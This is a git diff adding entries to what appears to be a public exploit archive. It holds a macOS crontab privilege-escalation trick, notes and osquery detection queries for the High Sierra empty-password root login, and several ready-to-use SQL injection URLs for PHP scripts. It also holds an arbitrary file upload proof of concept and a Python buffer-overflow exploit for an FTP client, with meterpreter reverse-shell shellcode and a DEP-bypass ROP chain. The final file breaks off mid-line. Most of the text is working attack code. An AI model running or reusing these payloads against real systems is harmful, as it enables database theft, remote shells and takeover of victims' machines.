diff --git a/exploits/macos/local/43247.md b/exploits/macos/local/43247.md
new file mode 100644
index 000000000..32663b68f
--- /dev/null
+++ b/exploits/macos/local/43247.md
@@ -0,0 +1,19 @@
+Recently I was working on an security issue in some other software that has yet to be disclosed which created a rather interesting condition. As a non-root user I was able to write to any file on the system that was not SIP-protected but the resulting file would not be root-owned, even if it previously was.
+
+This presented an interesting challenge for privilege escalation - how would you exploit this to obtain root access? The obvious first attempt was the sudoers file but sudo is smart enough not to process it if the file isn't root-owned so that didn't work.
+
+I then discovered (after a tip from a friend - thanks pndc!) that the cron system in macOS does not care who the crontab files are owned by. Getting root was a simple case of creating a crontab file at:
+
+```
+/var/at/tabs/root
+```
+
+with a 60-second cron line, eg:
+
+```
+* * * * * chown root:wheel /tmp/payload && chmod 4755 /tmp/payload
+```
+
+and then waiting for it to execute. It's not clear if this is a macOS-specific issue or a hangover from the BSD-inherited cron system, I suspect the latter.
+
+The issue has been reported to Apple so hopefully they will fix it.
\ No newline at end of file
diff --git a/exploits/macos/local/43248.md b/exploits/macos/local/43248.md
new file mode 100644
index 000000000..13de97f16
--- /dev/null
+++ b/exploits/macos/local/43248.md
@@ -0,0 +1,16 @@
+## Source: https://twitter.com/lemiorhan/status/935578694541770752 & https://forums.developer.apple.com/thread/79235
+"Dear @AppleSupport, we noticed a *HUGE* security issue at MacOS High Sierra. Anyone can login as "root" with empty password after clicking on login button several times. Are you aware of it @Apple?"
+
+
+## Proof: https://twitter.com/patrickwardle/status/935608904377077761
+
+
+## Mitigation/Detection/Forensic: https://news.ycombinator.com/item?id=15800676
+- Can be mitigated by enabling the root user with a strong password
+- Can be detected with `osquery` using `SELECT * FROM plist WHERE path = "/private/var/db/dslocal/nodes/Default/users/root.plist" AND key = "passwd" AND length(value) > 1;";`
+- You can see what time the root account was enabled using `SELECT * FROM plist WHERE path = "/private/var/db/dslocal/nodes/Default/users/root.plist" WHERE key = "accountPolicyData";` then base 64 decoding that into a file and then running `plutil -convert xml1` and looking at the `passwordLastSetTime` field.
+_Note: osquery needs to be running with `sudo` but if you have it deployed across a fleet of macs as a daemon then it will be running with `sudo` anyway._
+_Note: You can get the same info with plutil(1): `$ sudo plutil -p /private/var/db/dslocal/nodes/Default/users/root.plist`_
+
+
+## Security Advisory: https://support.apple.com/en-gb/HT208315
\ No newline at end of file
diff --git a/exploits/php/webapps/43102.txt b/exploits/php/webapps/43102.txt
index 4bc47379a..a32b63c50 100644
--- a/exploits/php/webapps/43102.txt
+++ b/exploits/php/webapps/43102.txt
@@ -21,6 +21,7 @@
# Proof of Concept:
#
# http://localhost/[PATH]/my_profile.php
+# http://localhost/[PATH]/view/teacher_profile2.php
# http://localhost/[PATH]/uploads/[FILE]
#
# Etc..
diff --git a/exploits/php/webapps/43235.txt b/exploits/php/webapps/43235.txt
new file mode 100644
index 000000000..89e838517
--- /dev/null
+++ b/exploits/php/webapps/43235.txt
@@ -0,0 +1,29 @@
+# # # # #
+# Exploit Title: DomainSale PHP Script 1.0 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://www.codester.com/ChewiScripts
+# Software Link: https://www.codester.com/items/5301/domainsale-php-script
+# Demo: http://chewiscripts.x10host.com/domain/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# 1)
+# http://localhost/[PATH]/domain.php?id=[SQL]
+#
+# 14'++/*!11111UNION*/(/*!11111SELECT*/+0x283129,/*!50000CONCAT_WS*/(0x203a20,USER(),DATABASE(),VERSION()),0x283329,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229)--+-
+#
+# http://server/domain.php?id=14'++/*!11111UNION*/(/*!11111SELECT*/+0x283129,/*!50000CONCAT_WS*/(0x203a20,USER(),DATABASE(),VERSION()),0x283329,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229)--+-
+#
+# # # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/43237.txt b/exploits/php/webapps/43237.txt
new file mode 100644
index 000000000..6a5e23123
--- /dev/null
+++ b/exploits/php/webapps/43237.txt
@@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: Simple Chatting System 1.0 - Arbitrary File Upload
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: http://yourphpscript.com/
+# Software Link: http://yourphpscript.com/index.php/product/simple-chatting-system-php-ajax-mysql-javascript/
+# Demo: http://chat.yourphpscript.com/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker upload arbitrary file....
+#
+# Proof of Concept:
+#
+# Users profile picture arbitrary file can be uploaded ..
+#
+# http://localhost/[PATH]/view/my_profile.php
+# http://localhost/[PATH]/uploads/[DATE].php
+#
+# # # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/43238.txt b/exploits/php/webapps/43238.txt
new file mode 100644
index 000000000..50d88b39e
--- /dev/null
+++ b/exploits/php/webapps/43238.txt
@@ -0,0 +1,29 @@
+# # # # #
+# Exploit Title: Website Auction Marketplace 2.0.5 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://flippa-clone.com/
+# Software Link: https://flippa-clone.com/
+# Demo: https://demo.flippa-clone.com/
+# Version: 2.0.5
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# 1)
+# http://localhost/[PATH]/search.php?cat_id=[SQL]
+#
+# 29' UNION(SELECT(1),(2),(3),(4),concat(version(),0x7e494853414e2053454e43414e),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54),(55),(56),(57),(58),(59),(60))-- -
+#
+# https://server/search.php?cat_id=29' UNION(SELECT(1),(2),(3),(4),concat(version(),0x7e494853414e2053454e43414e),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54),(55),(56),(57),(58),(59),(60))-- -
+#
+# # # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/43239.txt b/exploits/php/webapps/43239.txt
new file mode 100644
index 000000000..7da6e61ea
--- /dev/null
+++ b/exploits/php/webapps/43239.txt
@@ -0,0 +1,29 @@
+# # # # #
+# Exploit Title: Realestate Crowdfunding Script 2.7.2 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/realestate-crowdfunding-script/
+# Demo: http://thavasu.com/demo/crowdfunding/
+# Version: 2.7.2
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# 1)
+# http://localhost/[PATH]/single-cause.php?pid=[SQL]
+#
+# -23'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51))--+-
+#
+# http://server/single-cause.php?pid=-23'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51))--+-
+#
+# # # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/43240.txt b/exploits/php/webapps/43240.txt
new file mode 100644
index 000000000..51a1c75e0
--- /dev/null
+++ b/exploits/php/webapps/43240.txt
@@ -0,0 +1,37 @@
+# # # # #
+# Exploit Title: FS Thumbtack Clone 1.0 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://fortunescripts.com/
+# Software Link: https://fortunescripts.com/product/thumbtack-clone/
+# Demo: http://thumbtack-clone.demonstration.co.in/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# 1)
+# http://localhost/[PATH]/browse-category.php?cat=[SQL]
+#
+# -91a87ff679a2f3e71d9181a67b7542122c'++/*!22222UNION*/(/*!22222SELECT*/(1),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(3),(4))--+-
+#
+# http://server/browse-category.php?cat=-91a87ff679a2f3e71d9181a67b7542122c'++/*!22222UNION*/(/*!22222SELECT*/(1),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(3),(4))--+-
+#
+#
+# 2)
+# http://localhost/[PATH]/browse-scategory.php?sc=[SQL]
+#
+# -34202cb962ac59075b964b07152d234b70'++/*!22222UNION*/+/*!22222SELECT*/+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5,6,7,8,9--+-
+#
+# http://server/browse-scategory.php?sc=-34202cb962ac59075b964b07152d234b70'++/*!22222UNION*/+/*!22222SELECT*/+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5,6,7,8,9--+-
+#
+# # # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/43241.txt b/exploits/php/webapps/43241.txt
new file mode 100644
index 000000000..b21f559bb
--- /dev/null
+++ b/exploits/php/webapps/43241.txt
@@ -0,0 +1,30 @@
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/43242.txt b/exploits/php/webapps/43242.txt
new file mode 100644
index 000000000..540a0bfe9
--- /dev/null
+++ b/exploits/php/webapps/43242.txt
@@ -0,0 +1,30 @@
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/43243.txt b/exploits/php/webapps/43243.txt
new file mode 100644
index 000000000..46f044887
--- /dev/null
+++ b/exploits/php/webapps/43243.txt
@@ -0,0 +1,30 @@
+# # # # #
+# Exploit Title: FS Quibids Clone 1.0 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://fortunescripts.com/
+# Software Link: https://fortunescripts.com/product/quibids-clone/
+# Demo: http://quibids-clone.demonstration.co.in/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# 1)
+# http://localhost/[PATH]/itechd.php?productid=[SQL]
+#
+# Parameter: productid (GET)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause
+# Payload: productid=609 AND 2165=2165
+#
+# # # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/43244.txt b/exploits/php/webapps/43244.txt
new file mode 100644
index 000000000..eaca1106d
--- /dev/null
+++ b/exploits/php/webapps/43244.txt
@@ -0,0 +1,36 @@
+# # # # #
+# Exploit Title: FS Olx Clone 1.0 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://fortunescripts.com/
+# Software Link: https://fortunescripts.com/product/olx-clone/
+# Demo: http://olx-clone.demonstration.co.in/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# 1)
+# http://localhost/[PATH]/subpage.php?scat=[SQL]
+#
+# 51'++UNION+ALL+SELECT+1,2,3,4,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR+1,4,0x30),0x3a20,table_name,0x3c62723e))))x),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--+-
+#
+# http://server/subpage.php?scat=51'++UNION+ALL+SELECT+1,2,3,4,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR+1,4,0x30),0x3a20,table_name,0x3c62723e))))x),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--+-
+#
+# 2)
+# http://localhost/[PATH]/message.php?pid=[SQL]
+#
+# -1'++UNION+ALL+SELECT+1,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR+1,4,0x30),0x3a20,table_name,0x3c62723e))))x)--+-
+#
+# view-source:http://server/message.php?pid=-1'++UNION+ALL+SELECT+1,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR+1,4,0x30),0x3a20,table_name,0x3c62723e))))x)--+-
+#
+# # # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/43245.txt b/exploits/php/webapps/43245.txt
new file mode 100644
index 000000000..7f06f657c
--- /dev/null
+++ b/exploits/php/webapps/43245.txt
@@ -0,0 +1,28 @@
+# # # # #
+# Exploit Title: FS Monster Clone 1.0 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://fortunescripts.com/
+# Software Link: https://fortunescripts.com/product/monster-clone/
+# Demo: http://monster-clone.demonstration.co.in/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# 1)
+# http://localhost/[PATH]/Employer_Details.php?id=[SQL]
+#
+# -3'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR+1,4,0x30),0x3a20,table_name,0x3c62723e))))x),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32))--+-
+#
+#
+# # # # #
\ No newline at end of file
diff --git a/exploits/windows/remote/43236.py b/exploits/windows/remote/43236.py
new file mode 100755
index 000000000..a6664e2dc
--- /dev/null
+++ b/exploits/windows/remote/43236.py
@@ -0,0 +1,115 @@
+#!/usr/bin/env python
+#
+# Exploit Title : LabF nfsAxe 3.7 FTP Client (DEP Bypass)
+# Date : 12/8/2017
+# Exploit Author : wetw0rk
+# Vendor Homepage : http://www.labf.com/nfsaxe/nfs-server.html
+# Software link : http://www.labf.com/download/nfsaxe.exe
+# Version : 3.7
+# Tested on : Windows 7 (x86)
+# Description : Upon connection the victim is sent a specially crafted buffer
+# overwriting the SEH record, resulting in code execution.
+#
+# Greetz: abatchy17, mvrk, and Dillage (Dilly Dilly)
+#
+# Trigger the vulnerability by :
+# Login as -> [check] anonymous -> connect
+#
+
+import struct, socket
+
+host = "0.0.0.0"
+port = 21
+
+# msfvenom LHOST=192.168.0.12 LPORT=34 -p windows/meterpreter/reverse_tcp
+# -f python -b "\x00\x0a\x10" -v shellcode --smallest
+shellcode = ""
+shellcode += "\x2b\xc9\x66\xb9\x18\x01\xe8\xff\xff\xff\xff\xc1"
+shellcode += "\x5e\x30\x4c\x0e\x07\xe2\xfa\xfd\xea\x81\x04\x05"
+shellcode += "\x06\x67\x81\xec\x3b\xcb\x68\x86\x5e\x3f\x9b\x43"
+shellcode += "\x1e\x98\x46\x01\x9d\x65\x30\x16\xad\x51\x3a\x2c"
+shellcode += "\xe1\xb3\x1c\x40\x5e\x21\x08\x05\xe7\xe8\x25\x28"
+shellcode += "\xed\xc9\xde\x7f\x79\xa4\x62\x21\xb9\x79\x08\xbe"
+shellcode += "\x7a\x26\x40\xda\x72\x3a\xed\x6c\xb5\x66\x60\x40"
+shellcode += "\x91\xc8\x0d\x5d\xa5\x7d\x01\xc2\x7e\xc0\x4d\x9b"
+shellcode += "\x7f\xb0\xfc\x90\x9d\x5e\x55\x92\x6e\xb7\x2d\xaf"
+shellcode += "\x59\x26\xa4\x66\x23\x7b\x15\x85\x3a\xe8\x3c\x41"
+shellcode += "\x67\xb4\x0e\xe2\x66\x20\xe7\x35\x72\x6e\xa3\xfa"
+shellcode += "\x76\xf8\x75\xa5\xff\x33\x5c\x5d\x21\x20\x1d\x24"
+shellcode += "\x24\x2e\x7f\x61\xdd\xdc\xde\x0e\x94\x6c\x05\xd4"
+shellcode += "\xe2\xb8\xbe\x8d\x8e\xe7\xe7\xe2\xa0\xcc\xc0\xfd"
+shellcode += "\xda\xe0\xbe\x9e\x65\x4e\x24\x0d\x9f\x9f\xa0\x88"
+shellcode += "\x66\xf7\xf4\xcd\x8f\x27\xc3\xa9\x55\x7e\xc6\xa7"
+shellcode += "\xc6\x6f\x18\xb1\xbe\xdb\xb6\xb5\xb6\x95\x31\x5f"
+shellcode += "\xea\xeb\xec\xed\xfe\xef\x80\x91\xaa\x29\xcb\x1a"
+shellcode += "\x26\x38\x1d\x5e\xa0\xdb\x9a\x9a\xa6\x56\x75\xa5"
+shellcode += "\xb3\x2c\x01\x50\x16\xa3\xd4\x26\x94\xd3\xa9\x31"
+shellcode += "\xb6\x2f\x55\x43\xb4\x1c\x31\x8f\xe6\x8d\xec\xbf"
+shellcode += "\xbd\x83\xee\x34\x26\xb0\x0f\x24\x79\xc5\x9e\xb5"
+shellcode += "\x9e\xf7\xe8\xf9\xfa\xad\x96\xfd\x96\xa7\xa4\x52"
+shellcode += "\xe7\xfc\xd1\x96\x55\x6d\x08\x5f\x59\x5c\x64\x0f"
+shellcode += "\xd7\xc7\x4f\xee\xc7\x12\xd7\x3c\xd0\x62\xf6\xda"
+
+def create_rop_chain():
+ # https://www.corelan.be/index.php/security/corelan-ropdb/
+ # rop chain generated with mona.py - www.corelan.be
+ rop_gadgets = [
+ 0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
+ 0xfffffdff, # Value to negate, will become 0x00000201 (dwSize)
+ 0x7c347f98, # RETN (ROP NOP) [msvcr71.dll]
+ 0x7c3415a2, # JMP [EAX] [msvcr71.dll]
+ 0xffffffff, #
+ 0x7c376402, # skip 4 bytes [msvcr71.dll]
+ 0x7c351e05, # NEG EAX # RETN [msvcr71.dll]
+ 0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll]
+ 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
+ 0x7c344f87, # POP EDX # RETN [msvcr71.dll]
+ 0xffffffc0, # Value to negate, will become 0x00000040
+ 0x7c351eb1, # NEG EDX # RETN [msvcr71.dll]
+ 0x7c34d201, # POP ECX # RETN [msvcr71.dll]
+ 0x7c38b001, # &Writable location [msvcr71.dll]
+ 0x7c347f97, # POP EAX # RETN [msvcr71.dll]
+ 0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
+ 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
+ 0x7c345c30, # ptr to 'push esp # ret ' [msvcr71.dll]
+ ]
+ return ''.join(struct.pack('